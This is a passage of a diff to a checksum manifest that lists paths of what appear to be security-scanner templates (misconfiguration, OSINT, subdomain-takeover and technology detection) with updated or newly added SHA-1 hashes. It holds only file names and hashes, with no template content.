-http/misconfiguration/teslamate-unauth-access.yaml:ab333a0175b8072703d96c677e701225eb5d583e -http/misconfiguration/thinkphp-errors.yaml:fe7e97a7f4260b51a687689a834dd771506d73be +http/misconfiguration/teslamate-unauth-access.yaml:ccabcc80e1b1e1022f5f019c74267769442c3327 +http/misconfiguration/thinkphp-errors.yaml:2902d8ec9db82258e223d87aa5ff9dea07185f0b http/misconfiguration/tls-sni-proxy.yaml:88db8f544f105b8857d00bcbac05dfba04bbce47 http/misconfiguration/tomcat-cookie-exposed.yaml:2d04437adf429652538cdbf30e8f4c2d9752bbcb http/misconfiguration/tomcat-scripts.yaml:5dada29bb443b4b3b755efd24429579c9b027403 @@ -4085,13 +4229,13 @@ http/misconfiguration/unauth-apache-kafka-ui.yaml:c9b517f7dd4e3cff5a77cb69cbedb2 http/misconfiguration/unauth-axyom-network-manager.yaml:7de1b04b0ea39448b76e3a4636e68a0f79a08d76 http/misconfiguration/unauth-etherpad.yaml:72cdb5e5f7b84a5947fabb9d3a14ef0770a7625c http/misconfiguration/unauth-fastvue-dashboard.yaml:6f8012d5c39a7974492b0b3bc4378ec7f29cd109 -http/misconfiguration/unauth-kubecost.yaml:586fa7a3f0fdf4d01969f9ed59345fcc717a7ab3 -http/misconfiguration/unauth-ldap-account-manager.yaml:7841aefaa3db8863a320b2ac376d46222ee6898b -http/misconfiguration/unauth-mautic-upgrade.yaml:044f939a30237a0c177fdd2ac5768c4b3e04472a +http/misconfiguration/unauth-kubecost.yaml:cf5ed75a3ad825046650be6d641eef43604c6fca +http/misconfiguration/unauth-ldap-account-manager.yaml:f9d247acd5a4a4be6de3cc4388a5d21f2cb42ce6 +http/misconfiguration/unauth-mautic-upgrade.yaml:0f20b8a9b50e444a1800cc562b16307b13785082 http/misconfiguration/unauth-mercurial.yaml:f685b56668ce790a8a6d957d6fa3f66b0f9c0ebb http/misconfiguration/unauth-selenium-grid-console.yaml:9ff7020d809f1c112c310ac517d2bf464e82beba http/misconfiguration/unauth-wavink-panel.yaml:8b1bf62a41f209317e0cec3ab548d155071255d9 -http/misconfiguration/unauth-zwave-mqtt.yaml:675a193fc0ef154491af12f9982670ff7a117105 +http/misconfiguration/unauth-zwave-mqtt.yaml:9cf54b9740d773180c58201ec9037be57aaf5a75 http/misconfiguration/unauthenticated-alert-manager.yaml:7f4af786e9a0f3bf6bc70ff07b2c575b9bb35c7f http/misconfiguration/unauthenticated-glances.yaml:b4ebff1232636c091fe006186c4ec854ef909ca2 http/misconfiguration/unauthenticated-glowroot.yaml:dd77fbb801346b7c6d85cf5c836a7b5563c8a0e8 @@ -4109,12 +4253,13 @@ http/misconfiguration/unauthorized-h3csecparh-login.yaml:bab5d71b102634de749b008 http/misconfiguration/unauthorized-plastic-scm.yaml:3f8751b02dbb0804c00c437d4ab92706516aade6 http/misconfiguration/unauthorized-puppet-node-manager-detect.yaml:c0393ef3123007a72b6bfb21135c7f01eb2aa921 http/misconfiguration/ups-status.yaml:7eb98ca99aae057885bd21e3d502698e07f5f11e +http/misconfiguration/v2x-control.yaml:f7284b7ed11471e969a08fa5cd23ee7cd2d42617 http/misconfiguration/vernemq-status-page.yaml:df338184930933d0aef027903a1a72e33d6d5ea1 http/misconfiguration/viewpoint-system-status.yaml:2ba17cec9cc511e852796e663fadc19b28899e66 http/misconfiguration/wamp-server-configuration.yaml:d023f70e5a11c5450731e95aefde8c276eedbd1f http/misconfiguration/wamp-xdebug-detect.yaml:7c2cc85f478248d904ab10c4b875990a8bc7f8b2 -http/misconfiguration/webalizer-statistics.yaml:87c905ae2325eadcf7127f72ca4f6069ad9c2008 -http/misconfiguration/webdav-enabled.yaml:bbc4a43d7f7871a83d609feedd42a398e39f9bb5 +http/misconfiguration/webalizer-statistics.yaml:fb651305bfbc32d838d06d74b7f0ecf125a7fbd6 +http/misconfiguration/webdav-enabled.yaml:c67a388ef8b01b2852feaa4cfce203a14b85879b http/misconfiguration/wildcard-postmessage.yaml:f600770c60c689ad3def955a5e2206729da50cba http/misconfiguration/wp-registration-enabled.yaml:8539749f8fd5e3cf42e121296aae00bee3ddd4b9 http/misconfiguration/xss-deprecated-header.yaml:ffa5ee3c3277b0f8b408439a8a662f3005bb76fe @@ -4273,7 +4418,7 @@ http/osint/dissenter.yaml:f692dafb8fcb8f9a7f451fdad5e6d66f1a919c75 http/osint/dockerhub.yaml:0bc8d0f4a2772a1e165fa2e8cb8f66dc7d4ae777 http/osint/dojoverse.yaml:6354d760e9e3297e2b29147fc92aff1696fe8806 http/osint/donation-alerts.yaml:45daced37d140aa870ed31328d17cfcccf162a1c -http/osint/dotcards.yaml:559b371ba59e6bba6d2d2533cf2f0925ff18a59e +http/osint/dotcards.yaml:e452827a44654e9c8a45c6f7dfba353647a99cf7 http/osint/dribbble.yaml:4fb6d0d0d55bebe376243366526645dbbaae080c http/osint/droners.yaml:b75a1423bd07840a1b4eb3ca394b6e3e03b76abe http/osint/drum.yaml:75e2f2bf1a9106fcc68e0f143410edc8a2c4f28a @@ -4291,6 +4436,7 @@ http/osint/extralunchmoney.yaml:8f114438861f2c5bf618af758a3ee344d1ea5ebf http/osint/eyeem.yaml:0916699b15044c003e20a57fbb99dc62ff250a2c http/osint/f3.yaml:f1549565847063ca118399fabe5405651ea23b6a http/osint/fabswingers.yaml:eef7c9e2bf96394705c10b0f0a52cc3883a68149 +http/osint/facebook-page.yaml:a2fbb069653cbf4043cccb908b397b328e7e9aa7 http/osint/faktopedia.yaml:8e5f1031d9336faa466e8aecee7dde9a4aafab1f http/osint/fancentro.yaml:4f5d71bf45f2de2588df1ab705cfedd54c1b8a85 http/osint/fandalism.yaml:cf82dceb7291d309a529da7a51e2c4db28fd3b40 @@ -4426,7 +4572,7 @@ http/osint/lowcygierpl.yaml:af5e33f61e9b876f0342de4da6b4883aa7ca39e9 http/osint/maga-chat.yaml:48657b8c832073472e68cf6c1ba31a088d0c2ad5 http/osint/magabook.yaml:c8a584dc6bcef48e5be9f949694937a54b9579d1 http/osint/magix.yaml:2cfcd222e94b5580bb7358ca67d860f618dfda57 -http/osint/mail-archive.yaml:45f729baa711717fb332ef14168a0e9e78fbd697 +http/osint/mail-archive.yaml:583bc4bc5e9a00e94f24663a40da905e3f9bf48e http/osint/manyvids.yaml:fa159063b1d4e82d0b37887b1294524f7bd899c4 http/osint/mapmytracks.yaml:9fac3998ca5c89281240b731972dd873003dff3b http/osint/mapstodonspace-mastodon-instance.yaml:0b78c94b2dfb30cbbabaae9c81629a94de06ab57 @@ -4633,6 +4779,7 @@ http/osint/speedrun.yaml:45928289651a6d5a81dd71166cff88aea050550b http/osint/spiceworks.yaml:71e1c19fa9a537a5e7b98d263889948650b50c9c http/osint/sporcle.yaml:8d22fcff4bbfe5bf656f43745e585ec4d0bc255b http/osint/spotify.yaml:9cebd718dde1a4be503b229143a934cc621f55d7 +http/osint/stackoverflow.yaml:7067a391a7b077e56d92f0ffeaf0eb00efea3aa7 http/osint/steam.yaml:a7b205d4b1c4c934a8e26408b74d3d77ed4599c1 http/osint/steemit.yaml:878ad87476aaa22e5335ec9574fdd9693eb920ef http/osint/steller.yaml:a808aa15a0708003d198782bccce75f9e33beced @@ -4763,7 +4910,7 @@ http/takeovers/aha-takeover.yaml:5ce44a67c1725b09dc2eea987d4da31ec43f44ae http/takeovers/airee-takeover.yaml:3fd80d628f4b563459299ad878a256358015f82f http/takeovers/anima-takeover.yaml:fa5a85318b320a4c4cd79d0b5c955352f0badc78 http/takeovers/announcekit-takeover.yaml:24610659f1545855c3ce01cfbfc31d3224df1634 -http/takeovers/aws-bucket-takeover.yaml:641ae3d001908770d53297f8a5c3ef442c6f1ad4 +http/takeovers/aws-bucket-takeover.yaml:bb0255f61f283c264a1c3a42c54375d1874112a8 http/takeovers/bigcartel-takeover.yaml:d092cbe295a8fdac05088058e66f4decd80aa919 http/takeovers/bitbucket-takeover.yaml:fcf027f73f0bf36fb0701a2ccc9856d01768b0a0 http/takeovers/campaignmonitor-takeover.yaml:22826ba9f9e3c4fd742fe4325f5935f804b091f6 @@ -4777,7 +4924,7 @@ http/takeovers/gemfury-takeover.yaml:0f461c9fc4cf330260c8a2efce421421e71b4d3c http/takeovers/getresponse-takeover.yaml:1b442b3669c8fdab34bca275ff42ec1a1d513dfd http/takeovers/ghost-takeover.yaml:665b269efa862287271ea0e6fdf355a9610a4ab2 http/takeovers/gitbook-takeover.yaml:2ad94263283bbe7cabba42f2d44f63bb02d2561f -http/takeovers/github-takeover.yaml:8f96700b649982b50bcf06a82ef7acddeb63328a +http/takeovers/github-takeover.yaml:37b596fd85f2fa570c80be088069669dd5845764 http/takeovers/hatenablog-takeover.yaml:3bea61c75c93fadd502f1b90da8a0ad0a4200f97 http/takeovers/helpjuice-takeover.yaml:6d3e8093b7f2f98c75d9f5b60c002c95fc8878f5 http/takeovers/helprace-takeover.yaml:8cee0974f6eba201e9b9714ad2ab8481b730e7aa @@ -4818,7 +4965,7 @@ http/takeovers/uberflip-takeover.yaml:efed5863e4dbcba6d03e69fc7080477267c23fce http/takeovers/uptimerobot-takeover.yaml:47264000a2e3e6685a8382b17947125c7c56e2d2 http/takeovers/uservoice-takeover.yaml:3435a0ac07e609e958aa3af843610815dba14477 http/takeovers/vend-takeover.yaml:a86b368cabd5205fe2431e64701a71df2007bfe3 -http/takeovers/webflow-takeover.yaml:eff381c31669580a8a38f23ee525ed7ae3fa9435 +http/takeovers/webflow-takeover.yaml:71530b08a98f56c8177cfdee4a40cb733d1475fd http/takeovers/wishpond-takeover.yaml:9c367683b6008020c084929d622e18a2f2793a8b http/takeovers/wix-takeover.yaml:905340e0d7ddd4640ff1de3e6cb3306592ae08b0 http/takeovers/wordpress-takeover.yaml:b4e0598b906d6f85d2900e9cfaa13b4293f02f43 @@ -4837,7 +4984,7 @@ http/technologies/aerocms-detect.yaml:23801cf34eb2f61d219fdf7ad3b59985cb07b867 http/technologies/airtame-device-detect.yaml:c209bcb5ef5e35b43e3220dcd26cb08850913616 http/technologies/akamai-cache-detect.yaml:cfe24648b1c7616ed9c24011d2af62a8dbda440d http/technologies/akamai-detect.yaml:848727b7af8dc09aa17c4b907d65d6b249d124c7 -http/technologies/ambassador-edge-stack-detect.yaml:a7c9e03f12c20c8dfe7fe1e600801cf54287bdb2 +http/technologies/ambassador-edge-stack-detect.yaml:56a61460307c35c9ac96ff83a3ad13969eccfb64 http/technologies/angular-detect.yaml:dc854f56486955796f95baec3ade5cf1d408a9aa http/technologies/ansible-awx-detect.yaml:460dcd65474ab4481a5b173ea5618c23eabe7d42 http/technologies/apache/airflow-detect.yaml:b4e8a17c0cdf883ec321c9f41d6d0832ce47edc9 @@ -4855,7 +5002,7 @@ http/technologies/apache/default-apache2-page.yaml:2586786635609fcb0fe1faec11dd1 http/technologies/apache/default-apache2-ubuntu-page.yaml:cbcdd8c0da4707a40001141bf2cd0d5f37ff22a7 http/technologies/apache/kafka-manager-panel.yaml:9b2e8695e7c5d9cb938bbc6b4b64ad595fc6acb0 http/technologies/apache/ranger-detection.yaml:c225b0748cab7b8d0efa68e05630ab6e2a4ea676 -http/technologies/apache/tomcat-detect.yaml:8941925af443d594d976c4b6446cad1d81aa2970 +http/technologies/apache/tomcat-detect.yaml:7e32549c275c0fe8ae9857512ec1b49b12921650 http/technologies/apache/xampp-default-page.yaml:26e4f4c861533b63aa7772a99a1fe7e8ddb7a0cb http/technologies/apollo-server-detect.yaml:4d49ba226ce861d3e1cbb98a7287de15cfe90b16 http/technologies/appcms-detect.yaml:32a10eaadb5c9609e086d55f51ec70db04e27876 @@ -4865,8 +5012,8 @@ http/technologies/artica-web-proxy-detect.yaml:f610b5ddecd6021f5b3d631fee6535a3c http/technologies/autobahn-python-detect.yaml:b1f238285b929739dda5abed6b82a20046384582 http/technologies/avideo-detect.yaml:211bcc1dc1eed85018fdd23328357ba79604f671 http/technologies/aws/amazon-ec2-detect.yaml:a40798c7756011bf678153f4b2358f1e15aca444 -http/technologies/aws/aws-bucket-service.yaml:d28b7b220c831bfa41c101dfd0728b8a9d1bc7b6 -http/technologies/aws/aws-cloudfront-service.yaml:d57fa019d808a5d147087d6d3167fd9a6c8a7e40 +http/technologies/aws/aws-bucket-service.yaml:cca47ae93420418b4582a26f07b413981ec3e819 +http/technologies/aws/aws-cloudfront-service.yaml:a1490ee8ce3a0876f0e8c93a6b9cb0d94aad140c http/technologies/aws-elastic-beanstalk-detect.yaml:433a565e4f561cd2a51dd4c46679acf8dd0ae857 http/technologies/azure-kubernetes-service.yaml:298491f2b44d03fb0a228cdef1f42607bc33a36e http/technologies/b2b-builder-detect.yaml:3dcc2f10958e311be684a6419d37fc4f57fcf64d @@ -4880,19 +5027,20 @@ http/technologies/catalog-creator-detect.yaml:12f30f024563e12a08f26a3bba04c758f6 http/technologies/chevereto-detect.yaml:90159467c339c936704cb3b2f06bed0ee0905a95 http/technologies/citrix-hypervisor-page.yaml:b4446a09670fcea3586a94e8b39a1bea7721afb9 http/technologies/cloudflare-nginx-detect.yaml:46ea13ed91f80a1140313a1e10499f14f4fcee0b -http/technologies/cloudfoundry-detect.yaml:47abd57d3a02e7b8378dbd35d7a89bb907e922d3 +http/technologies/cloudfoundry-detect.yaml:5df5c4ce43ef18ef89fde4ab1589918ef9c85aec http/technologies/cobbler-version.yaml:a0a9fcac60406afec6ac2b242d0646bfd542aae0 http/technologies/cockpit-detect.yaml:21317193223eaac3e931c3a4aadc8a2bbd305c7b http/technologies/coming-soon-page-detect.yaml:c55304169964068f3ee827e647cfa7c70ed6e876 -http/technologies/confluence-detect.yaml:539a7913939e177d54615e8a012d37b7fe9137d6 +http/technologies/confluence-detect.yaml:4d3ee0b5c8571a4cd7d086a80dc54b98f97542da http/technologies/connectwise-control-detect.yaml:d385fd6fd66b7cabac2762f590fd773e129dec60 http/technologies/couchbase-sync-gateway.yaml:41a90baac0dbe015144c83893d49c261ae2165b9 http/technologies/craft-cms-detect.yaml:d388196ea17db2f0e8e9ee9ef9cebcd7e1e60816 http/technologies/csrfguard-detect.yaml:2bb9ce402d39d5ed3cd089ffaa4c598e4bf736f0 -http/technologies/cvsweb-detect.yaml:9cf1e8fc71fddea59b79e7459f99882471f3a2fc -http/technologies/dash-panel-detect.yaml:adedc4319c8daefd76f8b02a182b03fdcf5fa26f +http/technologies/cvsweb-detect.yaml:967f293d76b4bbdafeab216bf166945cadd654ef +http/technologies/dash-panel-detect.yaml:7e1bfaf0ddbe435ec3ec71f86535751719eb983d http/technologies/dedecms-detect.yaml:879d85c5e33e999295b56c578b531c58d5191949 -http/technologies/default-apache-shiro.yaml:9000bee51bcd5124a9c7397defdd8aadcb56e217 +http/technologies/default-apache-miracle.yaml:2d86c52daaf082ed1c9459029e7ea1a476b47ce9 +http/technologies/default-apache-shiro.yaml:026e54fab9a8472bb479efa8872b1fad85b4dc8e http/technologies/default-asp-net-page.yaml:4608178848e6163d23e1475eefadbd96115a6695 http/technologies/default-cakephp-page.yaml:f58dcedc410838f53227cd076f4f71df4382f0a4 http/technologies/default-centos-test-page.yaml:0e1b332fad22caac4582539d34ccd62f87e3c40f @@ -4914,7 +5062,7 @@ http/technologies/default-payara-server-page.yaml:648101cf121fa05d9ad6221fed7c8a http/technologies/default-plesk-page.yaml:7a558cdcace9485f27fd50f02a5da0d813676937 http/technologies/default-redhat-test-page.yaml:7f54d3e5dc8bb6e513a4cf08ff1a57e935298a00 http/technologies/default-runcloud-page.yaml:dd0f1eefa6c3c00cce022d029c4d66d751b2bdcf -http/technologies/default-sitecore-page.yaml:4bb1f42138a449570721f7db6c242b9aa1885500 +http/technologies/default-sitecore-page.yaml:0e9748f42ab4ba6b82bd599fbfa4151a0a6eed2e http/technologies/default-ssltls-test-page.yaml:8b25f387d462a8470e3856f0b12b98bfbe5ed8f8 http/technologies/default-symfony-page.yaml:15defe122101972263ace21887bf1e6ddf9844b5 http/technologies/default-tengine-page.yaml:a73e27fe9b442eb9f2b9d83ac48652eba239b34e @@ -4954,7 +5102,7 @@ http/technologies/goliath-detect.yaml:9ccc425dbf353b033a4a5aa39ea1a670e1b31d1e http/technologies/google/cloud-run-default-page.yaml:724ea50ff480d74b66cef2de66fd588d8d24507b http/technologies/google/firebase-detect.yaml:88b42d79bd0c5aaa4aca88e816f7f1d0a2970d50 http/technologies/google/firebase-urls.yaml:4425c679bc7b74d65e8106c436e3cbc981dd7839 -http/technologies/google/google-bucket-service.yaml:c3c4b0fd22b4be84c829e9fee0fbe4f037e1d195 +http/technologies/google/google-bucket-service.yaml:7b2f7a585cd8ddf79a70b7bcfac62018065be9a6 http/technologies/google/google-storage.yaml:25dac9ec332f5fcbbb28887df5aadf65917f7d95 http/technologies/google-frontend-httpserver.yaml:c416cb0e9df0144e8ebc2439d4b1e4a2cdd26697 http/technologies/graphiql-detect.yaml:669bc20536688af5e096bae8d47c674908326e33 @@ -4974,7 +5122,7 @@ http/technologies/hp-media-vault-detect.yaml:d8a766665ce4cbe3a42ef25bd7e68325cb8 http/technologies/hugo-detect.yaml:324f4b71e9bfa57a15510099f88eb6da267f452f http/technologies/ibm/ibm-http-server.yaml:4f33dade3acf3e3cd991f3a0988e8d179a513663 http/technologies/ibm/ibm-sterling-detect.yaml:2c70a7be8f738cc794bd7247fbe6d25ce34a7a29 -http/technologies/icecast-mediaserver-detect.yaml:9c8d88cfea14b12f5c14e72a05a96d4a176ef4cc +http/technologies/icecast-mediaserver-detect.yaml:c9584f5729c4434ca222b160998bd7ea515a3adc http/technologies/icecast-server-detect.yaml:e1570d43fd1b5db53918117c9e0a0d06c262b321 http/technologies/ilo-detect.yaml:2f7c2202e1087b808470f98b59eacf7540ca21af http/technologies/impresscms-detect.yaml:c82f9840a7b36378a9b85da7acb74f1b5c37c8a9 @@ -4986,8 +5134,9 @@ http/technologies/ispyconnect-detect.yaml:53eb66fe2e94e79f9f654a40813930dd04ad22 http/technologies/jboss-detect.yaml:df6032d62564299ca78e06a8931964618f0c6d39 http/technologies/jeecg-boot-detect.yaml:c2d789b213b0f71ab75759a50d80de95c5c7a765 http/technologies/jellyfin-detect.yaml:df4fb9e94effb52440cec30f6d742af1ae4d6524 -http/technologies/jenkins-detect.yaml:8daef22a72f50487ff59b90820afb2808a5119cc +http/technologies/jenkins-detect.yaml:7a0967d2a3d97321ab9620ad20ae7b3cb98fbcda http/technologies/jhipster-detect.yaml:b42fd6c84d56fbe83bf1ddc6ab57c2e188169ed4 +http/technologies/jira-detect.yaml:63e7961c4c5380514ef93e4e64f1f6eacc22fac0 http/technologies/jira-serverinfo.yaml:ffd9c99f55855bc1277acf84da660a41fcc21dca http/technologies/jitsi-meet-detect.yaml:1249770b5b3c81d99881b23844d06ddc10704157 http/technologies/jolokia-detect.yaml:2011275e69c3555dc1d053fe61c0770449d847af @@ -4998,7 +5147,7 @@ http/technologies/jspxcms-detect.yaml:1711e7a2e66a3e8138bd458a226f39ff9ea9cfcf http/technologies/kingsoft-webserver-detect.yaml:79ab441d709ae2ae216a4464ec1dff7ba96863fe http/technologies/kodexplorer-detect.yaml:bea3b4234276ffe731a7bdac7a88314bb568d93d http/technologies/kong-detect.yaml:fdc55fe05301bf675ff26e4e3ff82edca5b27a63 -http/technologies/kubernetes/etcd/etcd-version.yaml:3ec01f63b429b0b29754a204ffda505be05ed4f1 +http/technologies/kubernetes/etcd/etcd-version.yaml:3cbc4cf7a0a3c605b0116b0286edc599bc024ac2 http/technologies/kubernetes/kube-api/kube-api-deployments.yaml:760359484d862d49a6e9d9f4b48f1724a73f05d1 http/technologies/kubernetes/kube-api/kube-api-namespaces.yaml:a588fc970ba83d6f04be767d3a206cc7abc02bb5 http/technologies/kubernetes/kube-api/kube-api-nodes.yaml:f115b7b2e79164e6c70a48a13ed59cee5f8ac914 @@ -5022,7 +5171,9 @@ http/technologies/livehelperchat-detect.yaml:746ade897f39c5f6749a00887e6f99aaf24 http/technologies/lotus-domino-version.yaml:9293afeccfd39e59c1f1b139a45ab0228506f6fc http/technologies/lucee-detect.yaml:b9b7f4050e133986ce20e9517cadf206ca4d7754 http/technologies/lucy-admin-panel.yaml:4388b636ffb3765bc9a6e656cccfbc219a48535c -http/technologies/magento-detect.yaml:c04b533bd5c37240f29f3317dbd6a727c8ddf219 +http/technologies/magento-detect.yaml:f9f41886ba239324daaa5a38f62a6cc9c18375f0 +http/technologies/magento-eol.yaml:8fd66a30df76daf91c90bb0d745f3bc9e28e54f5 +http/technologies/magento-version-detect.yaml:1772ac7f198c57b21696a480b314a089aa542c34 http/technologies/magmi-detect.yaml:d3a95fc2cf849458e3c0cd8339a4bd30f82e831a http/technologies/maian-cart-detect.yaml:06d0012e6e340ecccbbf015050f61d6b72018cfa http/technologies/matrix-detect.yaml:102e7a2791897012d218dd00d6dad056fe513e9f @@ -5042,9 +5193,9 @@ http/technologies/moinmoin-detect.yaml:79fae3948e95cf2ad88d6f27d465d445feade67f http/technologies/mojoportal-detect.yaml:e380e018471d2230f68d02b5f3d035b85340c76c http/technologies/mongoose-server.yaml:80820020bb7e8c6bc6e3fb04c48fb85609625d9e http/technologies/monstracms-detect.yaml:fb3cc6ca939b7e7de438a679dad2e319b565196b -http/technologies/moveit-transfer-detect.yaml:3ffe8cb9cba7e0879623da2aae720a1886d6d96c +http/technologies/moveit-transfer-detect.yaml:c5f47883b00a8d1a44099bf218e81ad46b3c16bd http/technologies/mrtg-detect.yaml:6248e2f9fa7f6243e91b4348bf6e2627af1c7513 -http/technologies/nacos-version.yaml:e6d57f52a56cf1529601b0aed62dbe0eb6451236 +http/technologies/nacos-version.yaml:2c708c3b1fe279d3dde583711cd2cd837aa98bf0 http/technologies/neos-detect.yaml:6fa3c73066cb99e7c55ebccd3a0d4ddf6e28c7c2 http/technologies/netsweeper-webadmin-detect.yaml:c415f210db99b49ef0eb490bdfa2a440f67e508f http/technologies/nextcloud-detect.yaml:0c47f78f2b379f7e93168520ab3a140894456a47 @@ -5054,7 +5205,7 @@ http/technologies/nginx/default-nginx-page.yaml:e46d6f6ef8098d79251bc6cf74a15fbd http/technologies/nginx/nginx-linux-page.yaml:5eeb076514ffece273601f22d164e6ea8973343e http/technologies/nginx/nginx-version.yaml:9486c351698b9a3fe35675a00484a5f3bb4c63a5 http/technologies/nifi-detech.yaml:09277265e43b1ddbcf50a2a518cf6d585b7089b9 -http/technologies/nimplant-c2.yaml:a568513157a4d9d5cf83c913674c29e04535404d +http/technologies/nimplant-c2.yaml:df0b488a154cf1128093c5c2322aa150c2e21663 http/technologies/nimsoft-wasp.yaml:5074bd49a4dbfd5171755a075651486d98085859 http/technologies/node-red-detect.yaml:67c4e214e39b90e7152173a93e2af66e5653db49 http/technologies/notion-detect.yaml:03daa9c89839c7e4c220d429de498fa1de089d11 @@ -5067,9 +5218,10 @@ http/technologies/omni-commerce-connect-detect.yaml:e0ffe7e1fd00ac78927504134e54 http/technologies/oneblog-detect.yaml:beffcac9c860e1ff7d31133cbefe47db9b95e716 http/technologies/open-journal-systems.yaml:bad579c6f88bbfe47f4aeb1bda9ff29cd0054191 http/technologies/open-virtualization-manager-detect.yaml:5acd34f6ea7c044faf82a03ef80a44a90478d125 -http/technologies/openai-plugin.yaml:620c5e91a083baefd722285782082104388e2f2b -http/technologies/openethereum-server-detect.yaml:d8d7ae8434f319e36247419f23cb82e7bdaaec2b -http/technologies/openhap-detect.yaml:dee8a421a336b446f0b585f95e2e92a9582ccc1b +http/technologies/openai-plugin.yaml:34fa56fbe6ab899510e308bfee437e3b68f66404 +http/technologies/openethereum-server-detect.yaml:2b2e932c006724e7464264e51c135ba56f82a260 +http/technologies/openhap-detect.yaml:894949381443317b92163e2a7076179f36a27c24 +http/technologies/openproject-detect.yaml:4a7e086f4518c300bf96f0ac011c4a0e87554660 http/technologies/openresty-detect.yaml:b2c94e6b2823359006e523a48bb958ccd82eab29 http/technologies/openssl-detect.yaml:a0beb28e54e2ba6744c5711be8eb52e802f31dce http/technologies/operations-automation-default-page.yaml:3b43fab79835aa152c1b0cfdaf2e19d370152ca2 @@ -5084,13 +5236,14 @@ http/technologies/oracle/oracle-webcenter-sites.yaml:cc4807fd50427161f87e171af65 http/technologies/oracle-httpserver12c.yaml:5c56db2f161a501c32ae7425f3813603b3eba4b5 http/technologies/osquery-fleet-detect.yaml:ad81befc8a137e8bff96dff992df1ac25d964869 http/technologies/owasp-juice-shop-detected.yaml:052cb84749a35a27da8cb24c51c4278a1c1b862b -http/technologies/pagespeed-detect.yaml:62a2698e47eaa9e5d5ceb81d816092e904eb4025 +http/technologies/pagespeed-detect.yaml:b283ae22c9e3fb900ec477fbc3857209c4853e08 http/technologies/payara-micro-server-detect.yaml:f00e4913f2acdadc7a9f83bea8725d900d34253b http/technologies/pbootcms-detect.yaml:18235af683121570daf92ee43484234dc9f11fae http/technologies/pega-detect.yaml:16a5f067ed16ed60c55f7ad0630426555a6a14e0 http/technologies/php-detect.yaml:e942001b3009fb69d9e401c2d86dfe57aa0d28e0 http/technologies/php-fusion-detect.yaml:521b2deafb13276ec630ad2d6dec29347cdfe886 http/technologies/php-proxy-detect.yaml:4175dbbc5b41904fc6eeb74172e6801dfdaf6d3a +http/technologies/phplist-detect.yaml:14b0318ec6925effef5a1d1655c0f73c466fa9d5 http/technologies/phppgadmin-version.yaml:ae932f097b3a22db2780929bdd6bc2d4d62b7d02 http/technologies/pi-hole-detect.yaml:157a27f4c9f50aebafae7df0a14afd4eb26c6aef http/technologies/piwigo-detect.yaml:ec0a23e78b817dea11632bbe879f189876f99761 @@ -5122,22 +5275,22 @@ http/technologies/secui-waf-detect.yaml:d89347ef16596a1b3aa638ec36c3d2e41ac2c253 http/technologies/shiro-detect.yaml:e3544725c98df08ed993a912094e3b8066af694e http/technologies/shopizer-detect.yaml:b8d558eb9bb9f426a04e3eeb7c574342f039f0a1 http/technologies/shopware-detect.yaml:446ef652c04a13ee0ab4abec201e2bb09e2fe48b -http/technologies/sitecore-cms.yaml:d837ff9bfa6e4450b92bddfe5238e0ce6c9367de +http/technologies/sitecore-cms.yaml:99b456b5e241a9cb6c2aaea2c2ef3864e76e65b0 http/technologies/sitecore-version.yaml:6075eb729e4832d21b9f1c965dbb4cf13c096287 http/technologies/smartstore-detect.yaml:acfc789f9a997dfa6a93856deb2097927c22e808 http/technologies/smtp2go-detect.yaml:c358733f2612b6380481335cd9a3a335f82000c1 http/technologies/snipeit-panel.yaml:f51372782449ff5c06533fb8bd0d11d412e3c2a3 http/technologies/sogo-detect.yaml:2494792cbc3ae1d5aa41bb2d37760e12c5b57f3e http/technologies/sonicwall-email-security-detect.yaml:9c4a30f39c95bd8a3e465ff5eb914756c33d6f02 -http/technologies/spinnaker-detect.yaml:98fed877fbfe988faa8c2b50cbd65982332f4824 -http/technologies/splash-rendering-service.yaml:b37ff72886a052119cd08fc76fa0405c75838afd +http/technologies/spinnaker-detect.yaml:e92cdfc17dd19ce8bd03e3763a5eedbf48c2c8bc +http/technologies/splash-rendering-service.yaml:1ca34e9cff14a295561e9d7555ca5b9bd1f8a92d http/technologies/spring-detect.yaml:ff9fde86424bb48608508d13f65dfb02182a333c http/technologies/springboot-actuator.yaml:14d2de918bd4e073627fa7800236e0ffa1a76a25 http/technologies/strapi-cms-detect.yaml:ec99ccc09c1a276f7b96e32838a4402fd11a8ad0 http/technologies/subrion-cms-detect.yaml:36ee76aaebe55ab5b426ed192a8690a35d91996c http/technologies/sucuri-firewall.yaml:106eab99882ae9c378d77c17388fccbe0154afda http/technologies/swag-instance-default-page.yaml:ff391fb9c1341b1f24ae00fa8232e8bb4ed86340 -http/technologies/switch-protocol.yaml:74b50cb32bef7e55cad7be85b317237cc0057613 +http/technologies/switch-protocol.yaml:d099fd4f7cd30c426aa981db2c49e97a2e65d00c http/technologies/synology-web-station.yaml:f9ba3e6e9c3dd8a920237f181dc40b4bbeed966e http/technologies/tableau-server-detect.yaml:192d469b801287a25e95d4263a8db9b5e0cd097e http/technologies/tech-detect.yaml:054a93e739f0291de45052bafe3a835434311d0b @@ -5151,11 +5304,11 @@ http/technologies/tileserver-gl.yaml:474cb3eafcb739a597920143492d0c199d16be4a http/technologies/tor-socks-proxy.yaml:b05bd654d6792127981d887b29091531f2d367a5 http/technologies/tornado-server-login.yaml:18721c441bb854c823b75bdcf0a10d510b0d9942 http/technologies/typo3-detect.yaml:bf6c0d2b9aad14574078f1621e0a9b35178960c6 -http/technologies/utility-service-detect.yaml:2bdfef49dc9e179548f2c030c9d627f7872e5fca +http/technologies/utility-service-detect.yaml:5329222e470e73bc8687c25cc8e3672a49c24644 http/technologies/vbulletin-detect.yaml:57f981c3ab818d5cfe124354c1a32ff15ed3c68c http/technologies/versa/versa-analytics-server.yaml:bf132d9a5e819885110b00b2901df6d816630f6a http/technologies/versa/versa-director-api.yaml:a71d9eab4788a69bd4c98ee0ad5825451b880455 -http/technologies/versa/versa-networks-detect.yaml:a483ebaf63729847fc9fb3a7ecb692a65906f65a +http/technologies/versa/versa-networks-detect.yaml:c7a86c0a6e02f0e321b3bb6c53e9ca8bb66ed6e5 http/technologies/versa-flexvnf-server.yaml:fb082cccbaf9b05b55dc21bac64c7c42e9663f01 http/technologies/vivotex-web-console-detect.yaml:6f09889be44871f65145802b26f3bcdaace2aebc http/technologies/vmware/vmware-detect.yaml:5a4301cd023f8b8af216f73e0461d76a29d15629 @@ -5169,212 +5322,214 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 